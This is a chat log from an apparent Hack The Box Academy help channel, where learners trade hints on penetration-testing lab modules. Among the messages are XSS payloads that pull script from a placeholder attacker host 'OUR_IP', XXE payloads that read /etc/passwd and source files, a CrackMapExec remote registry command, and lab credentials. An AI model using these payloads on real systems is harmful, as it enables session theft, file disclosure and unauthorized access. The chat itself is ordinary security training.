#modules
I need assistance, I've tried so many ways
mount on local machine for sure
I'll give that a shot and come back if I can't figure it out
Are you doing this through evil-winrm?
I tried via evil-winrm, but the PtH attack via the Administrator account doesn't produce the relevant Kerberos ticket due to the way I auth
and no luck on cracking the hash
I've been stuck working through that dang webshell
even when tunneling via proxychains and chisel, no luck with GetUserSPNs or secretsdump
and back on the web shell my original LOL method to collect the SPNs and tickets via setspn threw the error of the missing assembly
It's...wild
@.@
Even after porting mimikatz over I can privilege::debug, but sekurlsa::tickets /export throws an error
that neither module is found
oh and PowerView/SharpView.... just refuse to work, most likely due to that missing assembly situation
Unless I'm just bad lol
oh bro lfg. thanks man
idk what lfg means here but 👍
let's fucking go
lol got it
DM me.
I'm in the credential hunting in Windows and I can't seem to get anywhere. I tried using lazagne.exe and it didn't find anything and findstr isn't finding anything useful either. Any hints with this one would be really helpful.
Also, lazagne keeps closing on me so I have very limited time to search through it before it closes.
are you running it through a terminal? or just clicking the icon?
I'm running it through the terminal.
try putting a -v at the end
I even tried with -vv and it still just completes and closes.
I'm going to try restarting the instance.
I even started a new instance and I'm running into the same problem. lazagne opens and runs and then closes after completing.
I was able to stop it by clicking in the window and found a password for gitlab but it says it's the wrong one. I'm really not sure what I'm doing wrong here.
Okay, I found a file with the first two answers. I still can't get lazagne to work properly. Any ideas why it just closes? Reinstalling it doesn't help either.
paste this in google or any of your browser: file:///C:/Users/ZaD_MINI07/Downloads/Untitled%20document%20(1).pdf
very nice
Created today xDDD
?
It doesn't work for u?
damn it
aight i'll try to share it a diff way
awww cmon who deleted it?
I tried using lazagne on the pwnbox as well and I have the same issue there I've always had. The rdp into the Windows box crashes and I then can't get xfreerdp to restart.
I've been looking for previous posts for the Skill Assessment for Command Injection, and couldn't find any. Any guidance you can give on this? I
So I resolved it, but got it in an unexpected way. I did not use the filters ||&,|,;|| which I would've never guessed without trying countless scenarios by accident. This was not so obvious. Did anyone else out there use those filters to solve this one?
You can dm me.
Okay, now the rdp session into the Windows machine even through my VM crashes and won't let me restart it. Is anyone else having issues with rdping into the provided vulnerable box?
@red current accept me as friend I’ll help
Thank you, userxfi. I just have the last question left to go.
is getting message Malicious request denied! close to solving Command Injection?
it can be
it's telling you something in your payload is being blocked
if you can narrow it down and then remove it, you can try other things
I've not noticed this, but I'm pretty sure some of the writers are indeed English 2nd language.
I have to give them credit because they're somewhat better at communicating than the more-skilled members of my university's cybersecurity club, despite being native English speakers, lol
well if you're running a business and service training cyber security they should be good at explaining and teaching the subject
If anyone has done the active directory bloodhound module I could use some help! I am on the very last question in the skills assessment
actually got it
hello
was wondering if i could get some help with XSS module
i am doing the session hijacking part
and i can't figure out why none of the payloads are sending any request to the server
```
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>
```
I used the following payloads and no luck
not sure what I am doing wrong
oh
nvm
Please keep this channel on topic.
sorry
is this the channel help for module questions?
or is there another one
where are you going to inject this? URL box?
Wasn't directed at you 🙂
ok ty <3
it was a portal to register
so input box
turned out i was trying all the suggested ones in the module
and the correct one wasn't the mentioned one
are you sure input box doesn't use sanitize function?
not for that module i assume
or at least not for that input
there were multiple ones to try the payloads on
use tampermonkey
the correct wasn't mentioned in the steps in the modules so i just skipped it
but it was the vulnerable one
i will add to my tool list ty for the suggestion <3
is there any jquery module? because you used $.getScript function.
not for that module
maybe later down the road
i found the correct one in the module
refrain from posting spoilers such as that in the chat :)
oki my bad

like you said you were able to find the right payload with a little digging, so I'm sure other people are just as capable :D
unless they are not good with Google Fu
In which case Hacking in general is not for you if you don't know how to google
and coding in general
by the way, you can do real hacking with greasemonkey or tampermonkey. by bypassing csp (Content Security Policy)
while that is true; HTB is focused on the whitehat side of things with redteaming more in mind; where you are doing sanctioned hacking
isn't it!? I guess we would never reuse an id_rsa...but these silly sys admins we're up against might 😉
I gotta use Google more and chatgpt less
lol me too, though I find chatgpt so helpful to explain concepts that aren't so clear in the modules
chatgpt can often be confidently incorrect
true but still an amazing supplementary study aid
It can easily become a crutch tho so I gotta be careful
Also; taking breaks is OK to do
nothing like a good sleep to get the mind thinking smoothly again
if you're getting frustrated on something that seems simple - take a break and come back
100%
Can't tell you how many times i've stepped away, come back and saw the answer was right in front of me
sometimes literally, plaintext
Attacking Authentication Mechanisms module question:
In the section "Weak Public/Private Keys" I'm not able to import the certificates into SAML Raider Certificates. It just shows the error message: "Error reading file. (signed overrun, bytes = 466)".
Did anyone face the same issue?
i think there's a not fully written question in module FILE INCLUSION page PHP Wrappers
that is a fully written question ... it is asking you to gain RCE and then read the flag at directory "/"
oh thanks in previous sections it said some specific directory with words so thats why i got confused
to clarify the single slash is not a directory itself but path to it
ok thanks
# Module: **Attacking Common Applications**
## Section: **WordPress - Discovery & Enumeration**
### Question: *Enumerate the host and find a flag.txt flag in an accessible directory.*
I have solved the other 2 questions but have no clue how to get this one. Any nudges would be helpful. Also I tried to read the source code but found nothing effective. Thanks in advance
navigate the website and check the source
Can someone help me with a slight hint in module FILE INCLUSION page PHP Wrapper. I can't figure it out the question is: Try to gain RCE using one of the PHP wrappers and read the flag at /
find a way to issue commands on the target, for example a command that can list files/directories and then use a different command to get the output of the contents of a file
ok thanks i will try
hello can someone help me in community help about attacking web applications with ffuf please ?
Hi all. I am really stuck in Miscellaneous Techniques on the Linux Privesc Module... I'm finding it nonsense from the explanation to the question... Could anyone help me? Thanks
can I know the HTB academy price per year ?
including tier 3 ||| and all modules @red obsidian
@autumn pilot Hey sorry for disturbing you but I still can't figure it out. I can display /etc/passwd and id but I can't understand what I am supposed to do and what to use to do it.
The file is somewhere in /
someone please?
Hi guys. I just finished Pivoting, Tunneling, and Port Forwarding Skills Assessment.
After getting the credentials for v**** how was I to know that the last host was on 172.16.6.** instead of 172.16.5.***?
is there any way of actually gaining cubes other than buying them?
When you get access to a machine, it's a good idea to run ipconfig/ifconfig, to see what all interfaces are on the machine.
The new 'HTB Seasons' that were announced seem to have cube rewards, at certain ranks.
okay i just rechecked. Normally thats the first thing i do. This time i obviously forgot that. 🙃 Thanks
Hi all, I'm a beginner,
can I start directly with the penetration tester path ? or should I look into something else before?
I've read the "learn-to-hack-beginners-bible" and I found there that beginner should learn:
- Networking
- Linux
- Windows
- Bash scripting
- A scripting language (like Python)
The only thing I do not have in this list is Networking knowledge. In the rest (2 to 5) I'm an expert
Guys after getting student subscription will i be able to fulfill cubes for job role path ?
there are Intro to Networking, Windows, and Linux. I'd recommend starting there. It won't hurt and chances are you'll learn something new
for both CBBH and CPTS, if you have the student subscription you have access to the entire course. Once the subscription ends though you will lose access (unless you fully completed the module).
you don't get cubes with the student subscription
^ forgot to mention that. You will be able to do the courses, but don't get any cubes from the subscription. Completing the modules still gives cubes
which module would be an intro to Networking please?
the one that has the name "intro to networking"
I'd do Intro to Networking and maybe Intro to Network Traffic Analysis as well
Guys hello, I am in the FOOTPRINTING EASY lab. I saw user:pass provided but want to do that without it. Did Hydra with ftp_betterdefaultpassword.txt and top usernames, but no luck. Can someone help me? (Nevermind, I found it, rockyou and 10k-most-common wordlists helped)
I Found it, thanks
@autumn pilot man I start feeling stupid but I still can't get it. I've been trying and I just can't understand. I do ../ so that I can go to supposedly / then I try flag or flag.txt and nothing. It's probably something simple but my mind can't think of it
Can I be a mod? Pleasseeee🥺 😢
list the files in the / directory
maybe thats where my problem is coming from i cant figure out how
are you using the examples in the section
yes
this is enough for you to execute commands, and eventually list files
yes i tried to read flag.txt or /etc/passwd for example but nothing happens i just dont understand how the whole command works
the thing is that the file is not called flag.txt
and the RCE is basic linux commands
Just a curiosity question:
How are (Intro to Networking and Network Traffic Analysis) compared to CCNA stuff?
I've never done CCNA so I can't answer that
okay network+ maybe? or any other networking certification?
haven't taken them.
alright, so they are not necessary to be good at hacking right?
you don't really need any cert to be "good at hacking"
imo certs are really just a way to show off what you know and bypass some basic interview questions/tests
not saying certs are bad, but you can still be good at something without them.
nice thanks
i use "ls" and nothing needed pops out i tried few other commands like pwd but i only got to some files with the extensions from the website and the source
take a break, and after the break go through the things again
a hint - the command from the section's examples is working
Hi All.
I am doing the CrackMapExec Module on HTB Academy and have noticed some typos in some of the texts. Where is the best place to feed this back?
Can someone give me a nudge please?
nudge -> you can access the share through the target without the need to mount it on your machine
thanks my G
Got a problem with Linux Fundamentals module
What is the type of the service of the "syslog.service"?
This module just got updated tho
can someone help me with the footprinting module footprinting lab -medium: Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
I have got the admin account and I'm in the database but I have no clue how to get the password
hi
can someone help me with this question
im stuck as it has rate limit
and there is no anti csrf token
Can someone help me with the File Upload Attacks module, Limited File Uploads section. I sent the xxe payload in burp and uploaded it to the target and can see a list of directories in the source code but cant interact with them. Can someone give me a hint please?
Module broken authentication section brute forcing passwords
you can use this payload with the file name, don't forget the directory. For example, to fetch files from the root directory we can use /file.txt
Thank you for the prompt reply.
I'm using that XXE payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```
I'm just not sure how to modify this section of it: "file:///etc/passwd"> ]
/etc/passwd is a file in linux
i have to delete my text as it contains the answer part.. i hope it helped u
Thank you! I was trying to provide a full path instead of just the file name.
HI
you can dm me
i need help with broken authentication module can sm1 help me
How can I figure out the type of service syslog.service is??
The second question I'm stuck on as well. I view the source code with the following script:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```
It gives me a long base64 string.
Then I used Burp Decoder to decode it:
```php
<?php
libxml_disable_entity_loader(false);
$svg_file = file_get_contents('./images/' . file_get_contents('./images/latest.xml'));
$doc = new DOMDocument();
$doc->loadXML($svg_file, LIBXML_NOENT | LIBXML_DTDLOAD);
$svg = $doc->getElementsByTagName('svg');
```
Am I doing this incorrectly? I still don't see an uploads directory?
answer is in this php code
Anyone done the Live Engagement lab from Shells and Payloads module?
It could be the worst lab I have done in HTB because the foothold machine is bad.
It should really be reworked
I have done it. It is a little unfortunately made. It could be reworked to spread the boxes over like the Easy, Medium and Hard challenges you might find in a different module. The biggest hurdle is working with the linux machine you have to log into.
If you need help, DM me
Not sure if I'm the only one but the Password attack module just drains all energy out of me
It is a lot of waiting indeed 😆
It's a true test of discipline. I spent 2 days max per module. I've been on this for 5 days now. Still waiting for the Hydra to crack the Easy machine.
@autumn pilot I did it man i found it thanks for the help and for not giving me the answer but making me think
anyone know the wordlist for Password Module - Easy? is it the ||mutated|| one? with username.list?
I just managed to finish almost 80% of it. I had to do a restart to the box and give it few extra minutes to finish setting up the environment.
But I completely agree with your suggestion of spreading it into three separate tasks. It’s a fun task to do but compared to the new refreshed labs, htb should redesign it.
For those of you who have done it, what do you guyz think of OSINT: Corporate Recon module? IDK if I should spend 1000 cubes on it lmaoo
Password Attacks/Pass the Ticket from Windows: cannot RDP via xfreerdp or evil-winrm, I thought I might have to go in and disablerestrictedadmin, but I cannot get in evil-winrm... am I missing something here?
try with the ||password.list||
You are correct, with the credentials they give you, you must make that change and then pass the ticket
restart the machine or check that the credentials are correctly written
ok, im gonna reset the machine and see if that helps...thanks bro
HI, I am stuck in the last question of "Bloodhound - Skills Assessment", Q: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78). Can someone help me please ?
I haven't worked through the new module yet, but this cheat sheet helped me at the time
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
hi could someone help me with the task 11 on the box called Appointment on starting point tier 1?
i did a SQL injection and got in the website, then got the root password but when i answered this question it always shows the answer as wrong so i cant enter the root flag at task 12
i'll send some screenshots of my tries (the first one with admin'# worked on the website so idk why it doesnt accept it here)
also my bad if this is the wrong place to ask for help on these starting point stuff, im not 100% sure where to ask ngl
It's asking for the words that are on the web page, isn't it? Not the injection you used.
oh I think I might've misunderstood the question, thanks lol I'll try that
And I think you want #boxes
This is for questions on the modules at HTB Academy.
yep thanks a lot for the help man, I'll use there if I need any help. I appreciate the help a lot
@hv7 You still stuck on imap/pop3?
any one do AD Enumeration & Attacks - Skills Assessment Part II can help me with question 6 " Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? "
Hi, I need help with the subscription to HTB on the portal. Clicking on the HTB Support leads to just discord opening and I am not sure where to ask for help. Could someone point me in the right direction?
use the chat bubble detail here https://help.hackthebox.com/en/articles/5987511-contacting-academy-support
Need some help? Learn how to reach the support team on Academy.
hint: use what you have to enumerate other existing machines on the network
In Attacking Common Applications, Splunk module, the server is not responding even when I have restarted it several times (and yes, I have tried to access to it on ports 8000 or 8090, where Splunk is usually running, and is running [used Nmap on it]) 🤔
you mean Attacking Common Applications?
oh, yes, erratum there
if you are in the Splunk - Discovery & Enumeration section the website should be on port 8000. If you can't see it maybe give the target a few min to fully boot up
Yes, I mean, the sections are simple. But I guess I'll just wait
Thank you
i just give it a quick try and right when the target is up there is nothing running on port 8000 but after like 2 min i can access Splunk on it
also you access it with https right?
Yep, it spawned finally. Took longer than usual, but well. Ty for the help
AD Enumeration & Attacks - Skills Assessment Part I .. I can't get the password of the user on MS01 .. I tried lazagne and tried finding it manually using findstr .. No luck .. any hints?
Which question are you on?
Find cleartext credentials for another domain user. Submit the username as your answer.
I already figured it out because of seeing dates and I knew who the user is
rn im actually gonna dump ths S** for hashes and see if I can make it
May I ask why the jump boxes (particularly linux ones) are mostly with resolution that was quite popular in 2003-2004?
if you think that with this resolution is easy to read stuff, then I should consider buying an old CRT monitor
HI
I'm stuck in Password Attacks Lab - Medium
I'm logged in with user Dennis but can't find how to privesc to root.
Apparently the solution is in Dennis' home directory, I tried to reuse the ssh key but I don't know the passphrase. I did try to crack it but no wordlist gives me the password.
there is no need to crack it, just simply try to find a way to see what this user might have done and repeat it
we see that he adds his public key in the authorized keys but I don't have the passphrase to reuse his key
you don't need it
I don't see what I can do
I must not be wide awake but if I try to connect with the key it asks me for a passphrase that I do not know
you don't need to copy the key
well if I take the history and I redo my own key it is just valid for dennis but not for root. I don't see how to login in ssh with root
all I can say is that you are more than half-way there
it was necessary to crack the passphrase of the key. it's just that I already had another key on my desktop from another module and I was not trying the right key ...
Hey, after dumping it I still couldn't find the clear text credentials .. can you help ?
Use || mimikatz ||
Already did it, that's how I got the NT hash
when i tried cracking it i didn't get the credentials
The password is displayed in plain text. You can not crack it
I sent u a screenshot prv to see what i meant
How do I serve files from Windows without downloading a tool like impacket?
just finished the footprinting module, gotta say that was a hard one.
what kind of an access do you have on the target (windows machine?)
I finished the Introduction to Academy yesterday and I definitely can say that I will be using this program daily from now on.
❤️
Hi ! I am working on Attacking Enterprise Networks - Web Enumeration & Exploitation
I can't manage to access the gitlab subdomain, it always redirects me to port 8081
Does someone had the same issue ? I tried to restart the instance several times
On nmap nothing shows up on port 8081
And port 8080 is the support host
But when I use curl I can see a redirection to the user directory, which when directly requested works
I am stuck on broken authentication predictable reset token question 1
I tried editing reset_token_time.py to generate the token. It keeps failing.
I manually tried creating the token with time difference +-1 but it also keeps failing
Nothing wrong with the instance it does that not sure why though. Something with Gitlab
alwer (929775749785849876) has been banned until 2023-06-04 13:52:31 (UTC).
Thank you
try in an incognito tab
Anyone here who can help me in Precious machine??
Hello guys , i have an question related to XSS reflected
What can the attacker do if he finds an XSS vulnerability?
As an attacker, not as a pentester
who did the passwords attacks module recently? i need to ask a question of a section i just completed but i didnt understand how it fully worked lol
(in the PassTheHash section)
what is the question?
i completed the exercise where it asks me to make a rev shell but i didnt understand why it worked
You are basically executing commands using the credentials you had over the DC which is another machine
To sum it up a bit more clearly, you act on behalf of X user on Y machine, and do a Z action
i was kinda confused cuz dont you already have julio DC01 hash to make pth?
in fact i tried directly to get the txt content by just navigating to julio's folders but didnt find the folder containing that txt, when i did the rev shell it was there instead
Try comparing the hostnames and ip addresses
so the julio hash that i have are on the MS01 and the rev shell made me connect to the julio on DC01?
yes
Can anyone assist with the CrackMapExec Module
I am trying to run the command
```
crackmapexec smb 10.129.121.154 -u robert -p Inlanefreight01! --computers
```
to get the answer to Q2
But I am getting the error
```
Error enumerating domain computers using dc ip 10.129.121.154: unsupported hash type MD4
```
I'm kind of stuck in the active subdomain enumeration section of information gathering - web edition. the first question was easy, the second q I'm not 100% sure if my reasoning was correct but the answer was accepted. q3 I was kinda just throwing things at the wall to see if something would stick, if you know what I mean. 🙂 been stuck at q4 for hours now
Hi. Can anyone help me with "Getting Started Privilge Escalation" ? I have made it to user2 and find id_rsa. But i have no clue how to copy the file id_rsa to my machine without the password from user2. I tried scp, python http server and I copied the content of the id_rsa and created a file on my computer with the same name and content. If i try to connect ... ||└─$ ssh user2@165.227.228.154 -p 30076 -i id_rsa
Load key "id_rsa": Permission denied||
HI,
On Password Attacks Lab - Hard
I can't find a wordlist that works to connect in rdp. I'm using crackmapexec apparently it should use the mutated list but it doesn't give me anything.
I tried I'm not sure of the user if it's johanna or Johanna but with both it doesn't work, I tried several lists and rockyou has been running for a while
The wordlist is the ||mut_password||, what configuration are you using with crackmapexec?
It's strange i have the good list.
I'm using this command:
```
crackmapexec rdp 10.129.62.124 -u johanna -p mut_password.list
```
use winrm RDP is slow as hell
winrm --local-auth
and its||mu||
try with ||crackmapexec winrm ip + user + mut_password --local-auth||
With the default configuration of crackmapexec I was not able to get johanna's credential, that's why adding|| --local-auth|| can get the credential
it doesn't return anything to me either
nah bro its
in the || mutated. || must be something wrong with your list
This hard lab is a tough one. You'll be cracking more passwords later so make sure to fix your file
I have 94044 words.
I will rebuild it
try that and recheck the name for Johanna
Also, you shouldn't take too long on johanna's password
It's the same, I have 94044 words.
I have restarted the box and this time it's good ...
Thanks @cunning marsh and @opaque niche 😉
bruteforcing smb, winrm; bloodhound data, rpcclient enum; kerbrute and etc
^^ no problem
I'm stuck on initial foothold in the medium lab of password attacks. I tried the provided usernames & passwords but no hits so far. Any hints?
What lists are you using for usernames and passwords?
The provided ones from the course username.list and password.list
With those two lists + hydra you should have no problem getting the credentials, try restarting the machine or downloading the files again
Should these creds work on smb? As i'm currently using SSH because I'm getting false positive results with crackmapexec on smb
I do not recommend using ssh as it is slow to look up credentials, if I remember correctly use ||smb|| to get the credentials with the lists mentioned in|| hydra||
I did not use crackmapexec because I tried with|| hydra|| first and it worked
Did you compile hydra with smb2 support? As I'm getting an smb error, that's the reason i'm using cme
what command are you using?
Hey friend !!!
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
I'm in as the jason user, don't know what's next, for dennis and root access
hello, can I send a photo through this chat? I can't understand one thing and I'd wish someone could help me
hint check what is running locally on that target machine
you need to verify your account first use ++verify at #bot-commands
i think i can't verify since i'm still in htb academy
im new tho
can i send a link for the community help channel where i posted my question?
Hello everyone, I'm new in this scope and I was trying to find some starting course. I've had a look at TryHackMe but then I found Hack The Box. Do you know if there are some free courses to get started and test something with my hands in Hack The Box? And if yes could you please redirect me to where those courses are?
I'm also new and im starting through HTB academy, once I finished the Introduction, I went into WEB Requests
appreciate!
^^
here, give both of these videos a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4
because this discord mainly for HTB main platform you need an account there to verify your discord account
wow that last footprinting lab is pretty tough ngl. Had to use an|| IMAP ||syntax hint. Took forever to find ||SNMP.||
tcm security has a great PNPT course. HTB is more challenging IMHO.
ooops!! tunneling and chiseling!! I think....
Thank you for the link it was helpful!
Hello, can someone lend me a hand with Attacking Common Applications – Skills Assessment 1 please? I was able to get RCE via ||http://10.129.201.89:8080/cgi/cmd.bat?&dir|| but no commands other than ‘dir’ work. I’m not sure what to do now, I’ve tried multiple commands with no results.
try to look for the CVE and then look at the examples
use "type" command to read the flag
and if it doesn't work, URL encode the payload and try again
I've already tried both those things on a file located in the directory I landed at but I'm not getting any output
On the "Abusing HTTP Misconfigurations" module I have completed everything but, "Bypassing Flawed Validation". Any tips on this one? Seems like it might be one of the easier ones but I'm stuck on it.
If you are still stuck, try configuring a mail client on your attack box with the creds you know.
anyone available for a dm on the last question in AD Attacks and Enum, Living off the Land? has to do with dsquery and ldap but don't want to spoil
How long does it take to crack Notes.zip in Protected Archives? I am half tempted to take this to my main OS and use a GPU.
It's obvious rockyou is not the way, and previously mutated passwords from the given file ETA 2 days? I mean, is there a reason to make it this difficult and time consuming to showcase a methodology?!
you're given a wordlist to use throughout the entirety of Password Attacks. You shouldn't need or use any other wordlists
Using said password list along with other mutated lists from it
other mutated lists? you should have just been asked to create one using the rule.list and hashcat
sorry custom.rule
Already tried that one, box expired before it finished
So I decided to create (smaller lists) from it
what are you using to crack it?
dont do hashcat. and did you put it into a hashable format before attempting to crack?
Yes of course
what's the hash per second speed when trying to crack it?
my vm isnt using a gpu and it was able to find it fairly quickly
I honestly need to look again. I really just wanted to make sure im not crazy 🤷♂️
Ill just use my host. No big deal
nah. if anything since i attempted to modify my passlist too it did create issues. i would try rebuilding it using the command given in the cheatsheet. should be ~94k passwords
Gotcha. Shall give a shot. Thank you!
np
I'm definitely doing something wrong none of these disabled users have descriptions🤔
Hello guys
I wanna know how to know the listening port
Cuz i was working on nibbles htb
After submitting a source port on netcat
Im getting this error
ncat: invalid source port number "n". quitting.
I actually have found creds in description before (in prod) 😁🤷♂️
I am working on the Service Enumeration with Nmap. The questions is " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I have used Nmap to find all the ports open, I have used Netcat to connect to each port open, I have also used the --packet-trace option like in the module, and used the banner script in Nmap but I am not finding any flag in any of the banners. I have used both the PWNBox as well as my own Kali box connected to the VPN. I have also respawned the box many times, and disconnected/reconnected to the VPN multiple times. I am not finding the flag is there anything else I should be trying I'm not sure what I am missing?
I don’t doubt it. I’m not saying it’s not useful to know, just that I’m doing something wrong to get the right results
Are you dumping from ldapsearch or natively?
using dsquery. That’s what was taught in the module so I’m trying to complete it that way
I’m definitely going to be doing the LDAP module after this
it’s for AD Enum & Attacks, Living off the Land
Ahh
module: footprinting ; section = footprinting Lab - easy. I am having issues accessing the ftp to browse thru it and download files. I had done the following unsuccessfully: how did you solve this one? any ideas on what I am doing wrong?
id have to do this one again to figure it out but i dont think getting into ftp was the way to do it.
it says you have to enumerate the target to get the answer. there is a TXT file hidden in the DNS server
I guess I was assuming that because ftp and ssh were available, that I need it to access ftp to obtain the rsa file for the ssh. I got on tunnel vision on that one. Thanks, I'll try to enumerate DNS and look for that file.
no problem. it happens to us all
let me know if you need further assistance with the labs
sure, let me enumerate the DNS and I let you know if I get stuck.
In the Skills Assessment of the Pivoting, Tunneling, and Port Forwarding module, does it make sense that the|| lsass.DMP file seems un-base64-encodable||?
My brain hurts now. The skill assessment took 4 days of working a little at a time and getting crazy frustrated over and over, but I finally finished the Broken Authentication module.
I'm stuck on the sql injections module. I don't really understand this question: We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
I followed all the steps in the module, but nothing came back. It didn't talk anything about php. Can someone help me understand?
Is it normal to get a public ip address for the question machine at the end of an exercise?
@dapper temple Yes it is. Sometimes dockers get used so you will get a public IP address for it.
Then how would the container know how to route back and point to my reverse address in my exploit if it's a Private network since its on tun0?
@dapper temple Dockers don't have access to the Internet
But I can browse to the victim machine which the module asks me to spin up. and it has a public address. My VPN is not even on I can reach it.
those challenges rarely if ever need a reverse shell to complete
Password Attacks Lab - Medium
i'm in dennis but , how to go to root
Something in that home folder🤷♂️
i have .ssh , so i need to connect via id_rsa or what?
Honestly, I was stuck on that and decided to do something what everyone should do when get any sort of creds
Does anyone know the fix for using xfreerdp on the Pwnbox? 4:47:32:975] [4734:4734] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.? inb4 someone says just use remmina.
Re-use dont abuse 🤣
😂
export DISPLAY=:1.01 maybe
@cold lake The hard module is actually way better. Has a rhythm to it✌️
tell me for root in medium lab
Literally the biggest hint re-use
okay, i think i got it
bruh i am new and i dont know how to start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Web Services & API Attacks - SOAPAction Spoofing -
Even googling I'm not seeing how I would go about figuring out the architecture of the webserver. It's a one-or-the-other question so I've got it, but I don't actually understand how I would find that.
Did you end up getting a fix for this apart from using Remmina?
it just ended up working a different day
¯\_(ツ)_/¯
also that was 2 months ago; if I did a fix i have since forgotten about it
Yeah, it was a long shot but thought I might ask as popped up in the discord search. And everyone else's fix was to just use Remmina.
Remmina is much more user friendly; all I can say is update your system and everything
but aside from that I have since lost any info on any TS i did
Yes, which of the mobile wallet app are you using?
that has nothing to do with anything skiddie bot
Whats the name of your mobile wallet?
Guess it's time to bring in the nukes? <@&861185840277487616>
hi
Hi Grey :) @rustic sage has been asking people about what digital wallet they use and apparently messaging people too
Dm me the details if you have them
just scroll up a bit :3 and I guess Axiom may have been dmed about it
I just straight ignore random dms
Stop being a weirdo and stay on topic, if you wish to talk cryptocurrencies this isn't the correct channel and probably not even the correct discord
If he DM'd you please send me the logs/screenshots, so that we have something more to work with
When im bored i reply shrug
Need help on Skills Assessment - File Inclusion. I pretty much know I'm doing the right things at the moment. But now the access.log stopped logging anything I do, so I can't progress. When I tried poisoning at first with just a random string it went through and showed up in the log, but after progressing from there, the log stopped logging anything I do, making the task impossible.
The targets also sometimes randomly crash or freeze on Hackthebox. This seems to happen way too often for a website this big. I have to restart the targets several times for me to once again connect to them.
Most of the time the access.log is too large to send, there are other log files you could try.
Unsure if just having a brain fart, but would like a small nudge.
Webservices & API - Information Disclosure (SQLi)
I've tried using sqlmap + manual SQL injection. Am I just failing in my manual testing?
wait.....i think I've been attacking the wrong thing ><
and forgot to put /?
can someone please help with Brute Forcing Cookies question 2 in Broken Authentication
What do you mean with "too large to send"? The file is readable on the web site, but it no longer wants to log anything
attacking common service: i spawned the machine like 6 times now but every time the|| 2121 ||port is closed
hint: you are on the right path, but if you inject something into the log file that the target web server can't process it will crash everything, so if you are using double quotes try single quotes
hint to get the right cookie when logging in you have to ||click something||
yeah this is a known bug, no idea why it keeps happening
Password Attacks Lab -Hard
what to do to find the Administrator account pass after you find Johnna's password
there is a certain thing (file) that sticks out
find it and think of a way how to break into the file
WEB SERVICE & API ATTACKS - INFORMATION DISCLOSURE (VIA SQLI)
Okay so I've been stuck on this particular one for a couple hours. I've walked through all the databases and I must just be missing the table i'm supposed to be looking into to grab the information on the answer.
Have not been able to find a username with the position of "736373"
I cannot seem to find the place where I can identify user positions just need a bit of help / hint
Where have you tried this password?
attack common services smb: i don't get a hit with the given wordlist?
for the user jason
the provided password list plus --local-auth if you are using cme
oh yes now i got it thanks
Is it possible to get any support for the CME HTB Academy module ?
depends if you ask a specific question, someone might jump in and assist as long as that someone has done the module or has comprehensive knowledge of cme
it feels like its a bug with the lab.
Trying to run a command from the instructions.
Tested from my machine via the VPN - Timeout
Tested from PwnBox also timeout
[★]$ sudo cme smb 10.129.97.108 -u Administrator -p 'AnotherC0mpl3xP4$$' --local-auth -x "reg add
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
SMB 10.129.97.108 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.129.97.108 445 MS01 [+] MS01\Administrator:AnotherC0mpl3xP4$$ (Pwn3d!)
ERROR:impacket:Could not connect: timed out
if i test by pinging the lab, its intermittently accessible
Ive tried restarting the target multiple times
Did you do something differently ?
nope, just copy and pasted the command
make sure you don't have an extra new line after reg add
Hey dpgg could I possibly get a small hint. I have UNION injection for Web Services & API Attacks - Information Disclosure (SQLi).
I have manually looked through everything and I'm not able to find where the positions are stored.
haven't done that module, sorry
Yeah i don't know, the command simply does not work for me
same thing every time
and the target intermittently drops off the network
ive tested other commands and they work
so, reset the target, then stop any VPN connection that you have both pwnbox and locally
give it 2-3 minutes and try again
this is from PwnBox currently
and theoretically speaking your command is on one single line, right?
i actually just this second copied it into VSCode and saw its 2 lines
will test again
edit it to be on one single line
i swear i am going insane, how does mssql work in the cli
i cant find anything from google, or it doesnt work
if you are trying to make it execute commands on the system, then you first must ensure that this "operation/operator" is enabled
Hi, does anyone know how to enable CPE credits under the VIP account? I don't seem to have the option at all
settings -> private information -> vault
Cool.. Thank you
what?
also if you are using sqsh, you have to type "GO" and run it to execute the query that you had prepared
im using mssqlclient but simple sql statements dont work
A general question regarding all the MSSQL questions. Is there a way to align the output in impacket-mssqlclient? For example when i try to view data in tables the output gets all scrambled, making it very hard to read. Or is my impacket-mssqlclient just broken??
Hi
HI,
On Password Attacks Lab - Hard
I downloaded the vhd file but the file is empty.
I looked at several resources to mount a vhd file and I have a problem installing the libguestfs-tools lib.
If anyone has any clue on the correct way to download the file and mount it.
The only way I found to upload the file is with smbmap :
smbmap -u user -p password -H 10.129.15.198 --download .\user\file.vhd
I used Remmina to mount a local folder and then on the Windows Box you can navigate to \\tsclient\<your folder>
Can you elaborate on this a bit more? Right now i'm trying sqsh instead of impacket-mssqlclient and for example i'm trying to view databases, so i did:
SELECT name FROM master.dbo.sysdatabases
GO
But nothing happens.
and i cant find the mssqlsvc user in the database
ow nvm, i forgot ';' at the end
have a look at responder
with remmina i can just connect with the first user, with d*** it doesn't work ...
On the forum other people downloaded the file in smb.
I think it is the good method, no?
